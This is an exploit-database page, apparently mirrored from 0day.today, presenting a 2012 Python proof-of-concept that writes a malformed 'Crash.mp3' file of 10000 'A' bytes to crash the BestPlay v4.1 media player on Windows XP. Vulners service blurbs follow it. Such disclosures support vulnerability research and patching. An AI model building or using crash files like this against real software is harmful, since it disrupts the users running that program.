Lucene search
+L

BestPlay v4.1 (.mp3) Crash PoC

🗓️ 18 Oct 2012 00:00:00Reported by LolzSecType 
zdt
 zdt
🔗 0day.today👁 21 Views

BestPlay v4.1 (.mp3) Crash PoC, version 4.1, 2012-10-18, Windows XP SP

Code
# Exploit Title: BestPlay v4.1 (.mp3) Crash PoC
# Version: 4.1
# Date: 2012-10-18
# Software Link: http://www.procesualitatea.ro/bestplay/
# Author: LolzSec
# Tested on: Windows XP SP3
# Greeting To : Da'One

#!/usr/bin/python

file="Crash.mp3"
crash="\x41" * 10000
try:
    print "[*] Creating exploit file...\n"
    writeFile = open (file, "w")
    writeFile.write(crash)
    writeFile.close()
    print "[*] File successfully created!"
except:
    print "[*] Error while creating file!"

#  0day.today [2018-01-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Oct 2012 00:00Current
6.8Medium risk
Vulners AI Score6.8
21